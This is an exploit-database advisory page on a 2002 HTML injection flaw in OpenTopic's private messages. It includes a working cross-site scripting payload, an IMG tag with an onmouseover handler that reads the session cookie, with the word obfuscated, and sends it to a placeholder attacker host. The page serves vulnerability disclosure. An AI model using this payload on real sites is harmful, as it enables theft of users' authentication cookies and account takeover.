header-logo
Suggest Exploit
vendor:
OpenTopic
by:
SecurityFocus
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: OpenTopic
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

HTML Injection Vulnerability in OpenTopic

A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts. When a victim user views any private messages, any malicious HTML code will be executed in the web browser in the security context of the site. Exploitation may allow for theft of cookie-based authentication credentials or other attacks.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6523/info

A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts.

When a victim user views any private messages, any malicious HTML code will be executed in the web browser in the security context of the site.

Exploitation may allow for theft of cookie-based authentication credentials or other attacks. 

[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]

Navigation

Suggest Exploit

Services By CQR